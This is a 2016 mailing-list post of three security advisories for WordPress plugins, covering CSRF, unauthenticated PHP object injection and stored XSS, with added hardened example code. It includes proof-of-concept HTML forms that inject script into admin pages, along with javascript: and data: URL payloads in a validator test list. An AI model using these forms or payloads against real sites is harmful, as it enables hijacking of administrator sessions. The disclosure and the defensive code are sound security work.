Date: Sun, 11 Dec 2016 10:02:54 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting three WordPress Plugins (XSS, &
 PHP object injection)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet [2] WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet [3] version 1.2.1.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Insert Html Snippet [2] is a plugin for WordPress that allows you to add
HTML, CSS and javascript code to your pages and posts easily using
shortcodes. It was discovered that the Insert Html Snippet WordPress
Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this
issue can be used to update an existing HTML snippet. This can be used
to insert arbitrary HTML and scripting code within a post or page that
uses the snippet.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Insert Html Snippet lacks protection against
Cross-Site Request Forgery attacks. See, for example, the code that is
used to edit a snippet (there is no nonce or referer check anywhere in
the handler):

if(isset($_POST) && isset($_POST['updateSubmit'])){

// 		echo '<pre>';
// 		print_r($_POST);
// 		die("JJJ");
	$_POST = stripslashes_deep($_POST);
	$_POST = xyz_trim_deep($_POST);

	$xyz_ihs_snippetId = $_GET['snippetId'];

	$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
	$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);

	$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
	$xyz_ihs_content = $_POST['snippetContent'];

	if($xyz_ihs_title != "" && $xyz_ihs_content != ""){

		if(ctype_alnum($temp_xyz_ihs_title))
		{
		$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;

		if($snippet_count == 0){
			$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';

			// snippet content is written to the database unchanged
			$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));

			// ... remainder of the handler omitted in the advisory
		}
		}
	}
}

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.
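
A hardened form of the same handler, added here as an illustration. This is not the plugin's code and not the fix shipped in version 1.2.1; it assumes the edit form and the handler are changed together, so that the form emits a nonce with wp_nonce_field() and the handler validates it with check_admin_referer() before any database write. The function names prefixed xyz_ihs_example_ are placeholders for this example.

```php
<?php
// Added example: nonce and capability check in front of the snippet update.
// Names prefixed xyz_ihs_example_ are placeholders, not plugin identifiers.

// 1. The edit form carries a nonce bound to the snippet being edited.
function xyz_ihs_example_render_edit_form( $snippet_id ) {
    $snippet_id = (int) $snippet_id;
    $action     = admin_url( 'admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=' . $snippet_id );

    echo '<form method="post" action="' . esc_url( $action ) . '">';
    // Emits a hidden xyz_ihs_nonce field (plus the referer field). The value
    // is tied to the current user and session, so another origin cannot forge it.
    wp_nonce_field( 'xyz_ihs_edit_snippet_' . $snippet_id, 'xyz_ihs_nonce' );
    echo '<input type="text" name="snippetTitle">';
    echo '<textarea name="snippetContent"></textarea>';
    echo '<input type="submit" name="updateSubmit" value="Update">';
    echo '</form>';
}

// 2. The handler refuses the request unless the nonce matches and the user
//    holds the capability; only then does it touch the database.
function xyz_ihs_example_handle_update() {
    global $wpdb;

    if ( ! isset( $_POST['updateSubmit'] ) ) {
        return;
    }

    $snippet_id = isset( $_GET['snippetId'] ) ? (int) $_GET['snippetId'] : 0;

    // A forged cross-site request cannot carry this nonce; on mismatch
    // check_admin_referer() calls wp_die() and nothing below runs.
    check_admin_referer( 'xyz_ihs_edit_snippet_' . $snippet_id, 'xyz_ihs_nonce' );

    // A valid nonce proves the request came from our form in this user's
    // session; it does not prove the user may edit snippets. Check that too.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
    }

    $title   = sanitize_text_field( wp_unslash( $_POST['snippetTitle'] ?? '' ) );
    $title   = str_replace( ' ', '-', $title );
    $content = wp_unslash( $_POST['snippetContent'] ?? '' ); // raw HTML by design of this plugin

    if ( $title === '' || $content === '' || ! ctype_alnum( str_replace( '-', '', $title ) ) ) {
        return;
    }

    $table = $wpdb->prefix . 'xyz_ihs_short_code';
    $dupes = $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$table} WHERE id != %d AND title = %s",
        $snippet_id,
        $title
    ) );
    if ( (int) $dupes !== 0 ) {
        return;
    }

    $wpdb->update(
        $table,
        array(
            'title'      => $title,
            'content'    => $content,
            'short_code' => '[xyz-ihs snippet="' . $title . '"]',
        ),
        array( 'id' => $snippet_id ),
        array( '%s', '%s', '%s' ),
        array( '%d' )
    );
}
```

The two checks are deliberately separate: the nonce defeats the cross-site form in the proof of concept, while current_user_can() is what stops a lower-privileged account that can reach the admin page from editing snippets. Both have to run before $wpdb->update().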

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
			<input type="hidden" name="snippetId" value="1" />
			<input type="hidden" name="snippetTitle" value="Fu" />
			<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
			<input type="hidden" name="updateSubmit" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html
[2] https://wordpress.org/plugins/insert-html-snippet/
[3] https://downloads.wordpress.org/plugin/insert-html-snippet.1.2.1.zip

------------------------------------------------------------------------
Google Analytics Counter Tracker WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Remco Vermeulen, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in Google Analytics
Counter Tracker, which can be used by an unauthenticated user to
instantiate arbitrary PHP objects. Using this vulnerability it is
possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0035

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Google Analytics Counter
Tracker [2] WordPress Plugin version 3.1.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Google Analytics Counter Tracker
version 3.5.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Google Analytics Counter Tracker [2] analyses the visitor hits on your
website and displays them graphically. A PHP Object injection [4]
vulnerability was found in Google Analytics Counter Tracker, which can
be used by an unauthenticated user to instantiate arbitrary PHP
objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
proccessRequest() method. The input is taken directly from the
wpadm_ga_request cookie, as can be seen in the following code fragment.
Note that the signature is only verified after the data has already
been unserialized, so the check cannot prevent object instantiation:

class.wpadm-ga.php:

protected static function proccessRequest() {
	$request_name = self::REQUEST_PARAM_NAME;
	// unserialize() runs on unauthenticated, attacker-controlled input
	$params = unserialize(base64_decode($_POST[$request_name]));

	// the signature is checked only after objects have been instantiated
	$v = self::verifySignature($params['sign'], get_option('wpadm_ga_pub_key'), md5(serialize($params['data'])));
	// ... remainder of the method omitted in the advisory
}

It has been confirmed that this issue can be used to execute arbitrary
PHP code.
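
The same request flow with the order reversed, added here as an illustration (this is not the plugin's code and not its 3.5.1 fix): the raw bytes are authenticated first, and only then decoded with a format that cannot instantiate objects. The example uses an HMAC with a placeholder key for the signature; the plugin uses a stored public key with its own verifySignature(), for which the equivalent is openssl_verify() over the same raw bytes. The function names prefixed example_ and the demo inputs are constructed for this example.

```php
<?php
// Added example, not the plugin's code: handle a signed request without
// ever calling unserialize() on unauthenticated input.
//
// Vulnerable order:  unserialize(input) -> verifySignature(...)
//   objects (and their __wakeup/__destruct methods) exist before the check.
// Order used here:   verify(raw bytes) -> decode into arrays only.

// Placeholder key for this example only (the plugin uses an asymmetric key).
const EXAMPLE_SHARED_KEY = 'example-only-replace-me';

function example_sign(string $raw, string $key): string {
    return hash_hmac('sha256', $raw, $key);
}

/**
 * Decode a request of the form ['data' => base64(JSON), 'sign' => hex HMAC].
 * Returns the decoded array, or null if the request must be ignored.
 */
function example_process_request(array $post, string $key): ?array {
    $raw  = $post['data'] ?? null;
    $sign = $post['sign'] ?? null;
    if (!is_string($raw) || !is_string($sign)) {
        return null;
    }

    // 1. Authenticate the bytes exactly as received. hash_equals() avoids
    //    the timing leak of comparing signatures with ==.
    if (!hash_equals(example_sign($raw, $key), $sign)) {
        return null;
    }

    // 2. Only now interpret them, with a format that has no notion of objects.
    $json = base64_decode($raw, true);
    if ($json === false) {
        return null;
    }
    $params = json_decode($json, true, 32);
    return is_array($params) ? $params : null;
}

/**
 * Fallback when the serialized format cannot be changed: PHP 7.0+ can refuse
 * to instantiate any class, so an O:...: payload degrades to a
 * __PHP_Incomplete_Class and no magic method runs.
 */
function example_unserialize_data_only(string $serialized) {
    return unserialize($serialized, ['allowed_classes' => false]);
}

// --- constructed demo input ------------------------------------------------
$good = ['data' => base64_encode(json_encode(['data' => ['site' => 'example.test']]))];
$good['sign'] = example_sign($good['data'], EXAMPLE_SHARED_KEY);
var_dump(example_process_request($good, EXAMPLE_SHARED_KEY));   // decoded array

// Valid signature, substituted payload: rejected before it is ever decoded.
$forged = ['data' => base64_encode('O:8:"stdClass":0:{}'), 'sign' => $good['sign']];
var_dump(example_process_request($forged, EXAMPLE_SHARED_KEY)); // NULL

// Object payload through the fallback: no stdClass instance is created.
var_dump(get_class(example_unserialize_data_only('O:8:"stdClass":0:{}')));
```

Moving the signature outside the serialized blob is what makes the reordering possible: as long as the signature travels inside the payload, the payload has to be parsed to find it, and parsing is the dangerous step.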

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/google_analytics_counter_tracker_wordpress_plugin_unauthenticed_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/analytics-counter/
[3] https://downloads.wordpress.org/plugin/analytics-counter.zip
[4] https://www.owasp.org/index.php/PHP_Object_Injection

------------------------------------------------------------------------
Stored Cross-Site Scripting in Gallery - Image Gallery WordPress Plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability was found in the Gallery
- Image Gallery plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0015

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Gallery - Image Gallery [2]
WordPress Plugin version 1.9.65.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Gallery - Image Gallery [3] WordPress Plugin
version 2.0.6.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gallery image is the best gallery plugin to use if you want to be
original with your website. A persistent Cross-Site Scripting
vulnerability was found in the Gallery - Image Gallery plugin. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a URL
provided by an attacker.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists because the Gallery image plugin does not protect
against CSRF attacks for the requests that edit gallery images. This
makes it possible to change gallery image URLs to javascript: URLs. The
JavaScript is saved, and every time a user clicks on the gallery image
the JavaScript runs (persistent Cross-Site Scripting).

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
Have an authenticated admin visit a webpage with the following form:

<html>
  <body>
    <form action="http://<wordpress site>/wp-admin/admin.php?page=gallerys_huge_it_gallery&id=2&task=apply&huge_it_nonce=b37a25b33d" method="POST">
      <input type="hidden" name="changedvalues" value="11" />
      <input type="hidden" name="name" value="New&#32;gallery" />
      <input type="hidden" name="imagess" value="" />
      <input type="hidden" name="order&#95;by&#95;11" value="1" />
      <input type="hidden" name="imagess11" value="Foo" />
      <input type="hidden" name="titleimage11" value="test" />
      <input type="hidden" name="im&#95;description11" value="asd" />
      <input type="hidden" name="sl&#95;url11" value="javascript&#58;alert&#40;1&#41;" />
      <input type="hidden" name="sl&#95;link&#95;target11" value="" />
      <input type="hidden" name="like&#95;11" value="9" />
      <input type="hidden" name="dislike&#95;11" value="0" />
      <input type="hidden" name="name" value="New&#32;gallery" />
      <input type="hidden" name="huge&#95;it&#95;sl&#95;effects" value="5" />
      <input type="hidden" name="sl&#95;width" value="600" />
      <input type="hidden" name="sl&#95;height" value="1" />
      <input type="hidden" name="gallery&#95;list&#95;effects&#95;s" value="cubeH" />
      <input type="hidden" name="sl&#95;position" value="center" />
      <input type="hidden" name="display&#95;type" value="2" />
      <input type="hidden" name="content&#95;per&#95;page" value="5" />
      <input type="hidden" name="autoslide" value="off" />
      <input type="hidden" name="autoslide" value="on" />
      <input type="hidden" name="pause&#95;on&#95;hover" value="off" />
      <input type="hidden" name="pause&#95;on&#95;hover" value="on" />
      <input type="hidden" name="sl&#95;pausetime" value="4000" />
      <input type="hidden" name="sl&#95;changespeed" value="1000" />
      <input type="hidden" name="rating" value="dislike" />
      <input type="hidden" name="task" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will change the URL for the image (the image source) to
javascript:alert(1). If a user clicks on the image name, the JavaScript
will run.
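
A server-side check for the stored value, added here as an illustration (not the plugin's code and not its 2.0.6 fix). The CSRF root cause is addressed by verifying a WordPress nonce with check_admin_referer() on the edit request; this block covers the second layer, refusing to store an image link whose scheme is anything other than http or https, so that a request which does get through cannot persist javascript:. WordPress's own esc_url() enforces the same allowlist via wp_allowed_protocols(); this stand-alone version spells the steps out and runs with plain php. The function name example_safe_link_url and the sample inputs are constructed for this example.

```php
<?php
// Added example, not the plugin's code: validate the per-image link before it
// is stored. Only http, https and scheme-less (relative) URLs are accepted.

/**
 * Returns the URL to store, or null if it must be rejected.
 */
function example_safe_link_url(string $url): ?string {
    // Browsers decode character references in attribute values, so decode
    // here too: a stored, entity-encoded "javascript&#58;" must not pass the
    // scheme check and then come back to life when echoed into an href.
    $u = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // URL parsers strip leading/trailing C0 controls and spaces and drop tabs
    // and newlines anywhere, so "\x01javascript:" and "java\tscript:" still
    // execute. Normalise the same way before looking at the scheme.
    $u = preg_replace('/^[\x00-\x20]+|[\x00-\x20]+$/', '', $u);
    $u = str_replace(["\t", "\n", "\r"], '', $u);

    if ($u === '') {
        return null;
    }

    // If a scheme is present it must be http or https (case-insensitive).
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $u, $m)) {
        if (!in_array(strtolower($m[1]), ['http', 'https'], true)) {
            return null; // javascript:, data:, vbscript:, file:, ...
        }
    }

    // Scheme-less values (relative paths, query strings, fragments) are kept.
    // The stored value must still be escaped on output with esc_url()/esc_attr().
    return $u;
}

// --- constructed demo input ---------------------------------------------------
$samples = [
    'https://example.test/gallery/1.jpg',
    '/wp-content/uploads/2016/07/photo.jpg',
    'javascript:alert(1)',                 // what the proof-of-concept form submits
    'javascript&#58;alert&#40;1&#41;',     // entity-encoded variant
    "\x01JaVaScRiPt:alert(1)",             // leading control character, mixed case
    "java\tscript:alert(1)",               // embedded tab
    'data:text/html,<script>alert(1)</script>',
];
foreach ($samples as $s) {
    $r = example_safe_link_url($s);
    printf("%-48s -> %s\n", json_encode($s), $r === null ? 'REJECT' : 'accept ' . $r);
}
```

Validation at storage time and escaping at output time are both needed: the check above keeps javascript: out of the database, and esc_url() on the way out covers values that were stored before the check existed.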

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_gallery___image_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/gallery-images/
[3] https://downloads.wordpress.org/plugin/gallery-images.2.0.6.zip
